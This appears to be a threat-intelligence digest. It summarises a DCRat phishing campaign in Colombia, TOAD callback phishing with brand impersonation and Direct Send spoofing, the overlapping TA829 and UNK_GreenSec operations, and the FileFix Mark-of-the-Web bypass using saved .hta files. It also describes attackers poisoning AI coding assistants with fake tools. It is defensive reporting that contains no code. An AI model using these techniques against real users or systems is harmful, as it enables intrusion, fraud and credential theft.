Update: DCRat Deployed in Phishing Campaign Targeting Windows Systems Across Colombian Organizations
A newly observed malware campaign is actively targeting organizations in Colombia with a focus on delivering DCRat (DarkCrystal RAT), a modular and commercially available Remote Access Trojan. This campaign, identified by Fortinet’s IR team, primarily abuses phishing emails impersonating Colombian government entities to deliver the malware. The emails carry password-protected ZIP archives containing a batch script that downloads an obfuscated VBS file, which in turn retrieves and executes a [.]NET-based payload concealed within an image via steganography. The final executable is decrypted using a hardcoded AES256 key and placed in a public directory, granting the attacker remote access to the infected system. DCRat is not a new tool—it has been circulating in underground forums since at least 2018—but this campaign marks a shift in geographic focus, targeting South American organizations, particularly those in the government and critical infrastructure sectors in Colombia. The malware is compatible with most Windows operating systems, including Windows 10 and 11, and can function on both user workstations and networked servers, extending its reach and damage potential within enterprise environments. Once installed, DCRat enables attackers to gain full control of the compromised system, offering capabilities such as keylogging, screenshot capture, file manipulation, system configuration changes, credential harvesting, and browser data theft. The malware also includes self-preservation features, including the ability to mark itself as a critical system process, which can crash the host via Blue Screen of Death if terminated with elevated privileges. While this campaign is currently focused on Colombia, DCRat’s accessibility and adaptability make it a broader risk to other regions—particularly where organizations lack robust email defenses or EDR visibility. The actor behind this campaign has not been definitively identified, but DCRat is commonly used by Russian-speaking cybercriminal groups and has been linked to infostealer distribution chains in prior global attacks. Its reuse here suggests either a local threat actor leveraging an established tool or the involvement of a broader, profit-driven cybercrime group expanding its reach.
Update: PDF-Based Callback Phishing Campaigns Leverage Brand Impersonation and Voice Attacks
Threat actors are increasingly relying on PDF-based phishing campaigns that exploit brand impersonation and social engineering to initiate Telephone-Oriented Attack Delivery (TOAD), a tactic in which victims are manipulated into calling fake support lines. These phishing emails often impersonate trusted brands, including Microsoft, DocuSign, PayPal, NortonLifeLock, and Geek Squad, and are crafted to appear urgent, referencing fraudulent transactions, expired subscriptions, or pending invoices. The emails include attached PDF files embedded with QR codes, hyperlinks, or annotations that redirect users to phishing portals or prompt a phone call. Once on the call, attackers posing as support agents use scripted interactions, spoofed caller IDs, and convincing technical jargon to manipulate victims into installing remote access tools, such as TeamViewer or AnyDesk, or into surrendering their credentials and payment details. A key technique also observed involves Microsoft 365's Direct Send feature, which allows phishing emails to spoof internal company addresses without actually compromising an account. This enables messages to bypass many traditional email security filters, increasing their credibility and success rate within corporate environments. Beyond typical phishing mechanics, attackers have expanded their arsenal by leveraging QR code-based PDF payloads with embedded URLs hidden within PDF form fields or sticky notes—methods that allow links to evade detection by some email gateways. Some campaigns also involve AI poisoning strategies, in which fake APIs and malicious open-source tools are seeded across platforms like GitHub and Stack Overflow to mislead AI coding assistants or large language models into recommending compromised domains. These techniques reflect a highly coordinated and multi-layered phishing ecosystem. The FBI has issued public warnings about groups like Luna Moth, which have used TOAD attacks to infiltrate corporate networks by posing as internal IT or finance departments. With attackers now blending traditional phishing, AI manipulation, and SEO poisoning, the threat landscape has become more complex and challenging to track, posing a significant risk to organizations that lack sufficient awareness training and detection capabilities.
TA829 and UNK_GreenSec Share Tactics, Infrastructure in Overlapping Malware Campaigns
ProofPoint Researchers have identified operational overlaps between two threat clusters—TA829 and a lesser-known actor dubbed UNK_GreenSec—both of which use shared tactics, tools, and infrastructure in malware delivery campaigns. TA829, known for deploying the RomCom RAT and linked to espionage and financially driven operations, has now been observed with similar tooling and delivery methods as UNK_GreenSec, which uses a malware loader called TransferLoader. Both groups leverage phishing emails containing links or PDF attachments that redirect to spoofed file-sharing pages, filtering out unwanted traffic and targeting real users. These campaigns have utilized compromised MikroTik routers as part of the REM Proxy infrastructure to relay traffic anonymously, allowing both clusters to send phishing emails through new freemail accounts and evade detection. Once the user interacts with the lure, the malware paths diverge; typically, SlipScreen is deployed, while UNK_GreenSec drops TransferLoader, both designed to load additional payloads post-infection. TA829 and UNK_GreenSec also share specific malware techniques, like using PuTTY’s PLINK tool to establish SSH tunnels and relying on IPFS for hosting follow-on components. SlipScreen checks system activity by querying how many recent documents a user has opened as a way to avoid sandboxes before loading shellcode that leads to payloads like MeltingClaw or RustyClaw. These tools eventually deploy RATs, such as RomCom (also known as SingleCamper), which are capable of surveillance and data exfiltration. TransferLoader, on the other hand, focuses on the stealthy delivery of malware, including Metasploit and the Morpheus ransomware. Though it remains unclear whether these two clusters are separate, partnered, or part of the same entity, the extent of shared infrastructure and tooling suggests a close relationship. As espionage and cybercrime operations increasingly overlap, analysts are observing threat groups reuse resources, which complicates attribution and defensive strategies.
FileFix Attack Bypasses Windows Security Warnings via Saved Web Content Exploit
The FileFix Attack is a newly identified technique that exploits how modern browsers, notably Chrome and Edge, handle saved web content, enabling malicious files to bypass Windows' Mark of the Web (MOTW) protections. MOTW is intended to mark files downloaded from the internet as potentially unsafe, triggering warnings when users attempt to open them. However, this attack exploits a loophole where certain MIME types—specifically text/html and application/xhtml+xml—do not apply MOTW when users save content using the browser’s “Save As” or Ctrl+S functionality. When attackers craft malicious HTML pages under these MIME types and guide users to save them as [.]mhtml or [.]html, no security flags are applied. If the file is saved or renamed with an [.]hta (HTML Application) extension, it bypasses MOTW entirely. Because [.]hta files can execute embedded scripts natively, attackers can embed JScript that runs silently on execution—without prompts—allowing actions like launching command shells or downloading payloads. The attack’s success depends on social engineering, not a software vulnerability. Threat actors commonly disguise phishing pages as legitimate content, like backup code generators, and instruct victims to save the page using a specific filename ending in [.]hta (e.g., “MfaBackupCodes2025[.]hta”). By manipulating the page’s <title> or download instructions, attackers trick users into preserving the malicious extension despite browser defaults that typically append .html. Additionally, they may use Data URIs with base64-encoded HTML content that, when saved locally, retains the original MIME type and still avoids MOTW. This method presents a significant risk because it combines user behavior with technical blind spots, enabling malware execution without triggering common defenses. While disabling mshta.exe can help mitigate risk, the tactic could be repurposed with other file types or scripting engines, making user training and stricter file handling policies essential.
